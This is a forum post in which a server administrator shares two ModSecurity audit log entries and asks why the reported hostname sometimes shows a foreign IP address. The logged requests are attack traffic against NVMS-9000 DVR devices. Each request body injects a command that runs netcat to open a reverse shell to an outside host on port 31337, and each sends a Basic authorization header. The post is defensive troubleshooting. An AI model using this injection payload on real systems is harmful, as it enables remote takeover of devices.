Strange behaviour modsecurity

simpel

Verified User
Joined
Jun 6, 2019
Messages
18
Sometimes modsecurity reports the hostname as a non-localserver ip address. Any one seeing this also?

example:

Two different reports ( same rule ):
lets assume our server's IP address is: 111.222.333.444

REPORT 1 (with correct hostname):
Code:
--76d5ab25-A--
[14/Oct/2019:09:47:56 +0200] XaQoLEL5IB6w0CMRG6frZAAAAL0 2.237.6.173 55941 [COLOR="#0000FF"]111.222.333.444[/COLOR] 80
--76d5ab25-B--
POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding: identity
Content-Length: 586
Accept-Language: en-us
Host: [COLOR="#0000FF"]111.222.333.444[/COLOR] 
Accept: */*
User-Agent: ApiTool
Connection: close
Cache-Control: max-age=0
Content-Type: text/xml
Authorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=

--76d5ab25-C--
<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip
</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type
="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>
--76d5ab25-F--
HTTP/1.1 500 Internal Server Error
Content-Length: 532
Connection: close
Content-Type: text/html; charset=iso-8859-1

--76d5ab25-H--
Message: XML parser error: XML: Failed parsing document.
Message: XML parser error: XML: Failed parsing document.
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 2.237.6.173] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "[COLOR="#0000FF"]111.222.333.444[/COLOR]"] [uri "/editBlackAndWhiteList"
] [unique_id "XaQoLEL5IB6w0CMRG6frZAAAAL0"]
in this case the hostname ip is correct, its the same as out servers ip (111.222.333.444).





REPORT 2 (same day, same serrver, same rule triggered but a couple of hours later that day):
Code:
--c209e53c-A--
[14/Oct/2019:16:04:52 +0200] XaSAhEL5IB6w0CMRG6fr3AAAAKA 192.182.166.214 59608 [COLOR="#0000FF"]111.222.333.444[/COLOR] 80
--c209e53c-B--
POST /editBlackAndWhiteList HTTP/1.1
Accept-Encoding: identity
Content-Length: 586
Accept-Language: en-us
Host: [COLOR="#FF0000"]94.26.22.50[/COLOR]
Accept: */*
User-Agent: ApiTool
Connection: close
Cache-Control: max-age=0
Content-Type: text/xml
Authorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=

--c209e53c-C--
<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>
--c209e53c-F--
HTTP/1.1 500 Internal Server Error
Content-Length: 532
Connection: close
Content-Type: text/html; charset=iso-8859-1

--c209e53c-H--
Message: XML parser error: XML: Failed parsing document.
Message: XML parser error: XML: Failed parsing document.
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 192.182.166.214] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "[COLOR="#FF0000"]94.26.22.50[/COLOR]"] [uri "/editBlackAndWhiteList"] [unique_id "XaSAhEL5IB6w0CMRG6fr3AAAAKA"]
in this case the hostname is reported as 94.26.22.50, which is very definitly NOT our server's ip number!

how is this possible?
 
Top